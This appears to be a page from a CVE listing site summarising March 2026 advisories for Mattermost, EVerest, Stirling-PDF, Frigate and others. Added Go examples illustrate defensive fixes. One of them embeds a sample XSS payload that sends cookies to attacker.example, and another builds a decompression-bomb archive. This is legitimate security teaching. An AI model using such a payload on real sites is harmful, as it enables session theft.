Total CVEs

141,249

Critical Severity

3,795

High Severity

13,708

Last 7 Days

2,157
Showing Year: 2026 (January 1 - December 31, 2026)
Showing 8,261 - 8,280 of 13,819 CVEs
CVE-2026-33759 MEDIUM - 5.3

WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `objects/playlistsVideos.json.php` endpoint returns the full video contents of any playlist by ID without any authentication or authorization check. Private playlists (including `watch_later` and `favorite` types...

Vendor: composer
Product: wwbn/avideo
Published: Mar 26, 2026
Source: GitHub

OpenFGA is a high-performance and flexible authorization/permission engine built for developers and inspired by Google Zanzibar. In versions prior to 1.13.1, under specific conditions, models using conditions with caching enabled can result in two different check requests producing the same cache ke...

Vendor: go
Product: github.com/openfga/openfga
Published: Mar 26, 2026
Source: GitHub
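The OpenFGA entry above describes two different check requests collapsing onto one cache key when conditions are in play. The advisory text does not say which request field was left out of the key, so the example below is an added illustration (not OpenFGA's own code) that assumes the omitted input is the condition context: the vulnerable key covers only store, model and tuple, while the fixed key also folds in a canonical, length-prefixed encoding of the context. The `CheckRequest` type, the `ip_in_range`-style condition and the `10.0.` prefix policy are all made up for the demonstration.

```go
package main

import (
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"sort"
	"strings"
)

// CheckRequest models the inputs to a relationship check: who, which relation,
// on which object, plus the context that conditional relations evaluate against.
// Field names are assumptions for this example, not OpenFGA's API.
type CheckRequest struct {
	StoreID  string
	ModelID  string
	User     string
	Relation string
	Object   string
	Context  map[string]string // e.g. {"ip": "10.0.0.5"} for a hypothetical ip_in_range condition
}

// keyOmittingContext reproduces the failure mode: the key covers the tuple but
// not the condition inputs, so two requests that differ only in context collide
// and share one cached verdict.
func keyOmittingContext(r CheckRequest) string {
	return digest(r.StoreID, r.ModelID, r.User, r.Relation, r.Object)
}

// keyWithContext covers every input the verdict depends on. Context keys are
// sorted so Go's randomized map iteration cannot yield two keys for one request.
func keyWithContext(r CheckRequest) string {
	names := make([]string, 0, len(r.Context))
	for k := range r.Context {
		names = append(names, k)
	}
	sort.Strings(names)
	parts := []string{r.StoreID, r.ModelID, r.User, r.Relation, r.Object}
	for _, k := range names {
		parts = append(parts, k+"="+r.Context[k])
	}
	return digest(parts...)
}

// digest length-prefixes each part so that "ab"+"c" and "a"+"bc" cannot
// produce the same preimage.
func digest(parts ...string) string {
	h := sha256.New()
	for _, p := range parts {
		fmt.Fprintf(h, "%d:%s;", len(p), p)
	}
	return hex.EncodeToString(h.Sum(nil))
}

// evaluate stands in for the real check: the relation holds only when the
// caller's ip context falls inside a made-up allowed prefix.
func evaluate(r CheckRequest) bool {
	return strings.HasPrefix(r.Context["ip"], "10.0.")
}

// cachedCheck answers from cache when the key is present, otherwise evaluates
// and stores. keyFn selects the vulnerable or the fixed key construction.
func cachedCheck(cache map[string]bool, keyFn func(CheckRequest) string, r CheckRequest) bool {
	k := keyFn(r)
	if v, ok := cache[k]; ok {
		return v
	}
	v := evaluate(r)
	cache[k] = v
	return v
}

func main() {
	inside := CheckRequest{StoreID: "s1", ModelID: "m1", User: "user:anne", Relation: "viewer",
		Object: "doc:budget", Context: map[string]string{"ip": "10.0.0.5"}}
	outside := inside
	outside.Context = map[string]string{"ip": "203.0.113.9"}

	bad := map[string]bool{}
	fmt.Println("omitting context:", cachedCheck(bad, keyOmittingContext, inside), cachedCheck(bad, keyOmittingContext, outside))
	good := map[string]bool{}
	fmt.Println("with context:   ", cachedCheck(good, keyWithContext, inside), cachedCheck(good, keyWithContext, outside))
}
```

With the vulnerable key, the second caller (outside the allowed range) is served the first caller's cached "allowed" verdict; with the fixed key the two requests are distinct entries and the second is denied. The general rule the fix encodes: a check cache key must be a function of every input that can change the answer, including the model version and any condition context.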
CVE-2026-33535 MEDIUM - 4.0

ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to 7.1.2-18 and 6.9.13-43, an out-of-bounds write of a zero byte exists in the X11 `display` interaction path that could lead to a crash. Versions 7.1.2-18 and 6.9.13-43 patch the issue.

Vendor: nuget
Product: Magick.NET-Q16-AnyCPU
Published: Mar 26, 2026
Source: GitHub
CVE-2026-3116 MEDIUM - 4.9

Mattermost Plugins versions <=11.4, 11.0.4, 11.1.3, 11.3.2, 10.11.11.0 fail to validate incoming request size which allows an authenticated attacker to cause service disruption via the webhook endpoint. Mattermost Advisory ID: MMSA-2026-00589

Published: Mar 26, 2026
Source: NVD
CVE-2026-3115 MEDIUM - 4.3

Mattermost versions 11.2.x <= 11.2.2, 10.11.x <= 10.11.10, 11.4.x <= 11.4.0, 11.3.x <= 11.3.1 fail to apply view restrictions when retrieving group member IDs, which allows authenticated guest users to enumerate user IDs outside their allowed visibility scope via the group retrieval endp...

Vendor: mattermost
Product: mattermost_server
Published: Mar 26, 2026
Source: NVD
CVE-2026-3114 MEDIUM - 6.5

Mattermost versions 11.4.x <= 11.4.0, 11.3.x <= 11.3.1, 11.2.x <= 11.2.3, 10.11.x <= 10.11.11 fail to validate decompressed archive entry sizes during file extraction which allows authenticated users with file upload permissions to cause a denial of service via crafted zip archives conta...

Vendor: mattermost
Product: mattermost_server
Published: Mar 26, 2026
Source: NVD
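The CVE-2026-3114 entry above is the classic decompression-bomb shape: a small upload whose entries inflate to far more than the server expects. The following Go example is added here and is not Mattermost's code; it contrasts an extractor that reads whatever an entry inflates to with one that caps bytes actually emitted by the decompressor per entry and across the archive. The 1 MiB / 4 MiB limits and the `buildArchive` sample (one entry of zero bytes, which DEFLATE shrinks by roughly a thousand to one) are constructed for the demonstration.

```go
package main

import (
	"archive/zip"
	"bytes"
	"errors"
	"fmt"
	"io"
)

// Limits are assumptions for this example, not values from any real product.
const (
	maxEntryBytes = 1 << 20 // 1 MiB per extracted entry
	maxTotalBytes = 4 << 20 // 4 MiB across the whole archive
)

var ErrTooLarge = errors.New("archive exceeds decompressed size limit")

// extractUnsafe reads every byte each entry inflates to. Work (and, in a real
// extractor that writes to disk or memory, storage) is bounded only by what the
// attacker chose to compress, not by the size of the upload.
func extractUnsafe(archive []byte) (int64, error) {
	r, err := zip.NewReader(bytes.NewReader(archive), int64(len(archive)))
	if err != nil {
		return 0, err
	}
	var total int64
	for _, f := range r.File {
		rc, err := f.Open()
		if err != nil {
			return total, err
		}
		n, err := io.Copy(io.Discard, rc)
		rc.Close()
		total += n
		if err != nil {
			return total, err
		}
	}
	return total, nil
}

// extractChecked enforces per-entry and cumulative caps on the bytes the
// decompressor actually produces. The header's UncompressedSize64 is attacker
// controlled, so it is used only as a cheap early rejection, never as the
// trusted bound.
func extractChecked(archive []byte) (int64, error) {
	r, err := zip.NewReader(bytes.NewReader(archive), int64(len(archive)))
	if err != nil {
		return 0, err
	}
	var total int64
	for _, f := range r.File {
		if f.UncompressedSize64 > maxEntryBytes {
			return total, fmt.Errorf("%s: %w", f.Name, ErrTooLarge)
		}
		rc, err := f.Open()
		if err != nil {
			return total, err
		}
		// Read at most one byte past the cap so "exactly at the limit" and
		// "over the limit" are distinguishable without inflating further.
		n, err := io.Copy(io.Discard, io.LimitReader(rc, maxEntryBytes+1))
		rc.Close()
		if err != nil {
			return total, err
		}
		if n > maxEntryBytes || total+n > maxTotalBytes {
			return total, fmt.Errorf("%s: %w", f.Name, ErrTooLarge)
		}
		total += n
	}
	return total, nil
}

// buildArchive is a constructed sample: one entry of `size` zero bytes, which
// compresses to a few kilobytes regardless of size.
func buildArchive(name string, size int) []byte {
	var buf bytes.Buffer
	w := zip.NewWriter(&buf)
	fw, _ := w.Create(name)
	fw.Write(make([]byte, size))
	w.Close()
	return buf.Bytes()
}

func main() {
	bomb := buildArchive("payload.bin", 8<<20) // 8 MiB of zeros
	fmt.Printf("upload size: %d bytes\n", len(bomb))
	n, err := extractUnsafe(bomb)
	fmt.Printf("unsafe:  inflated %d bytes, err=%v\n", n, err)
	n, err = extractChecked(bomb)
	fmt.Printf("checked: inflated %d bytes, err=%v\n", n, err)
}
```

The important design point is the `io.LimitReader` around the entry reader: an honest header lets the early check reject the entry, but a forged header (or a format whose headers are not authenticated at all) is caught only by counting what inflate emits. The cumulative `maxTotalBytes` check closes the other obvious bypass, many entries each just under the per-entry cap.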
CVE-2026-3113 MEDIUM - 5.0

Mattermost versions 11.4.x <= 11.4.0, 11.3.x <= 11.3.1, 11.2.x <= 11.2.3, 10.11.x <= 10.11.11 fail to set permissions on downloaded bulk export which allows other local users on the server to be able to read contents of the bulk export. Mattermost Advisory ID: MMSA-2026-00593

Vendor: mattermost
Product: mattermost_server
Published: Mar 26, 2026
Source: NVD
CVE-2026-3112 MEDIUM - 6.8

Mattermost versions 11.4.x <= 11.4.0, 11.3.x <= 11.3.1, 11.2.x <= 11.2.3, 10.11.x <= 10.11.11 fail to validate Advanced Logging file target paths which allows system administrators to read arbitrary host files via malicious AdvancedLoggingJSON configuration in support packet generation. ...

Vendor: mattermost
Product: mattermost_server
Published: Mar 26, 2026
Source: NVD
CVE-2026-34071 MEDIUM - 5.4

Stirling-PDF is a locally hosted web application that allows you to perform various operations on PDF files. In version 2.7.3, the /api/v1/convert/eml/pdf endpoint with parameter downloadHtml=true returns unsanitized HTML from the email body with Content-Type: text/html. An attacker who sends a mali...

Vendor: Stirling-Tools
Product: Stirling-PDF
Published: Mar 26, 2026
Source: NVD
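The CVE-2026-34071 entry above is the response-side half of stored XSS: the server hands an attacker-controlled email body back to the browser under `text/html`, so it is parsed as markup in the application's origin. The Go example below is added for illustration and is not Stirling-PDF's code; it puts the described handler next to two hardened variants (serve as an opaque attachment, or escape and show inline) and a small probe that checks which of them would render active content. The `emailBody` sample is constructed, and the route path is only reused from the advisory text for the probe request.

```go
package main

import (
	"fmt"
	"html"
	"io"
	"net/http"
	"net/http/httptest"
	"strings"
)

// emailBody is a constructed sample of an attacker-supplied HTML email body.
const emailBody = `<p>Invoice attached.</p><script>document.location='https://attacker.example/?c='+document.cookie</script>`

// serveRawHTML reproduces the pattern described: the untrusted body goes back
// verbatim with an HTML media type, so the browser renders it in the app origin.
func serveRawHTML(w http.ResponseWriter, r *http.Request) {
	w.Header().Set("Content-Type", "text/html; charset=utf-8")
	fmt.Fprint(w, emailBody)
}

// serveAsDownload keeps the same bytes but makes the browser treat them as an
// opaque attachment: no inline rendering, no sniffing, and a CSP that blocks
// script execution even if a client does open it in a renderer.
func serveAsDownload(w http.ResponseWriter, r *http.Request) {
	w.Header().Set("Content-Type", "application/octet-stream")
	w.Header().Set("Content-Disposition", `attachment; filename="email.html"`)
	w.Header().Set("X-Content-Type-Options", "nosniff")
	w.Header().Set("Content-Security-Policy", "default-src 'none'; sandbox")
	fmt.Fprint(w, emailBody)
}

// serveEscaped is the alternative when the body must be shown inline: markup
// is escaped so it is displayed as text rather than interpreted.
func serveEscaped(w http.ResponseWriter, r *http.Request) {
	w.Header().Set("Content-Type", "text/html; charset=utf-8")
	w.Header().Set("X-Content-Type-Options", "nosniff")
	fmt.Fprintf(w, "<pre>%s</pre>", html.EscapeString(emailBody))
}

// responseFor runs a handler against a request for the affected route and
// returns the headers and body for inspection.
func responseFor(h http.HandlerFunc) (http.Header, string) {
	rec := httptest.NewRecorder()
	req := httptest.NewRequest(http.MethodGet, "/api/v1/convert/eml/pdf?downloadHtml=true", nil)
	h(rec, req)
	resp := rec.Result()
	defer resp.Body.Close()
	body, _ := io.ReadAll(resp.Body)
	return resp.Header, string(body)
}

// rendersActiveContent is a coarse check for the dangerous combination: an
// HTML media type, no attachment disposition, and a literal script element
// in the body. It is a test oracle, not a substitute for a browser.
func rendersActiveContent(h http.HandlerFunc) bool {
	hdr, body := responseFor(h)
	inlineHTML := strings.HasPrefix(hdr.Get("Content-Type"), "text/html") &&
		!strings.HasPrefix(hdr.Get("Content-Disposition"), "attachment")
	return inlineHTML && strings.Contains(body, "<script>")
}

func main() {
	for name, h := range map[string]http.HandlerFunc{
		"raw html": serveRawHTML,
		"download": serveAsDownload,
		"escaped":  serveEscaped,
	} {
		fmt.Printf("%-9s renders active content: %v\n", name, rendersActiveContent(h))
	}
}
```

Which hardened variant fits depends on the feature: a download endpoint should never need the browser to parse the file, so the attachment plus `nosniff` plus restrictive CSP combination is the cheaper fix; only a preview feature justifies the escaping (or a proper HTML sanitizer) path.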
CVE-2026-33470 MEDIUM - 6.5

Frigate is a network video recorder (NVR) with realtime local object detection for IP cameras. In version 0.17.0, a low-privilege authenticated user restricted to one camera can access snapshots from other cameras. This is possible through a chain of two authorization problems: `/api/timeline` retur...

Vendor: blakeblackshear
Product: frigate
Published: Mar 26, 2026
Source: NVD
CVE-2026-33469 MEDIUM - 6.5

Frigate is a network video recorder (NVR) with realtime local object detection for IP cameras. In version 0.17.0, an authenticated non-admin user can retrieve the full raw Frigate configuration through `/api/config/raw`. This exposes sensitive values that are intentionally redacted from `/api/config...

Vendor: blakeblackshear
Product: frigate
Published: Mar 26, 2026
Source: NVD
CVE-2026-33438 MEDIUM - 6.5

Stirling-PDF is a locally hosted web application that allows you to perform various operations on PDF files. Versions starting in 2.1.5 and prior to 2.5.2 have Denial of Service (DoS) vulnerability in the Stirling-PDF watermark functionality (`/api/v1/security/add-watermark` endpoint). The vulnerabi...

Vendor: Stirling-Tools
Product: Stirling-PDF
Published: Mar 26, 2026
Source: NVD
CVE-2026-33402 MEDIUM - 6.1

Sakai is a Collaboration and Learning Environment (CLE). In versions 23.0 through 23.4 and 25.0 through 25.1, group titles and description can contain cross-site scripting scripts. The patch is included in releases 25.2 and 23.5. As a workaround, one can check the SAKAI_SITE_GROUP table for titles a...

Vendor: sakaiproject
Product: sakai
Published: Mar 26, 2026
Source: NVD
CVE-2026-33015 MEDIUM - 5.2

EVerest is an EV charging software stack. Prior to version 2026.02.0, even immediately after CSMS performs a RemoteStop (StopTransaction), the EVSE can return to `PrepareCharging` via the EV's BCB toggle, allowing session restart. This breaks the irreversibility of remote stop and can bypass op...

Vendor: EVerest
Product: everest-core
Published: Mar 26, 2026
Source: NVD
CVE-2026-33014 MEDIUM - 5.2

EVerest is an EV charging software stack. Prior to version 2026.02.0, during RemoteStop processing, a delayed authorization response restores `authorized` back to true, defeating the `stop_transaction()` call condition on PowerOff events. As a result, the transaction can remain open even after a rem...

Vendor: EVerest
Product: everest-core
Published: Mar 26, 2026
Source: NVD
CVE-2026-29905 MEDIUM - 6.5

Kirby CMS through 5.1.4 allows an authenticated user with 'Editor' permissions to cause a persistent Denial of Service (DoS) via a malformed image upload. The application fails to properly validate the return value of the PHP getimagesize() function. When the system attempts to process thi...

Vendor: composer
Product: getkirby/cms
Published: Mar 26, 2026
Source: NVD
CVE-2026-29044 MEDIUM - 5.0

EVerest is an EV charging software stack. Prior to version 2026.02.0, when WithdrawAuthorization is processed before the TransactionStarted event, AuthHandler determines `transaction_active=false` and only calls `withdraw_authorization_callback`. This path ultimately calls `Charger::deauthorize()`, ...

Vendor: EVerest
Product: everest-core
Published: Mar 26, 2026
Source: NVD
CVE-2026-27814 MEDIUM - 4.2

EVerest is an EV charging software stack. Versions prior to 2026.02.0 have a data race (C++ UB) triggered when an AC 1-phase ↔ 3-phase switch request (`ac_switch_three_phases_while_charging`) issued during charging/waiting executes concurrently with the state machine loop. Version 2026.02.0 contains a patch.

Vendor: EVerest
Product: everest-core
Published: Mar 26, 2026
Source: NVD
CVE-2026-27813 MEDIUM - 5.3

EVerest is an EV charging software stack. Versions prior to 2026.02.0 have a data race leading to use-after-free. This is triggered by EV plug-in/unplug and RFID/RemoteStart/OCPP authorization events (or delayed authorization response). Version 2026.02.0 contains a patch.

Vendor: EVerest
Product: everest-core
Published: Mar 26, 2026
Source: NVD
CVE-2026-26073 MEDIUM - 5.9

EVerest is an EV charging software stack. Versions prior to 2026.02.0 have a data race leading to possible `std::queue`/`std::deque` corruption. The trigger is powermeter public key update and EV session/error events (while OCPP not started). This results in a TSAN data race report and an ASAN/UBSAN...

Vendor: EVerest
Product: everest-core
Published: Mar 26, 2026
Source: NVD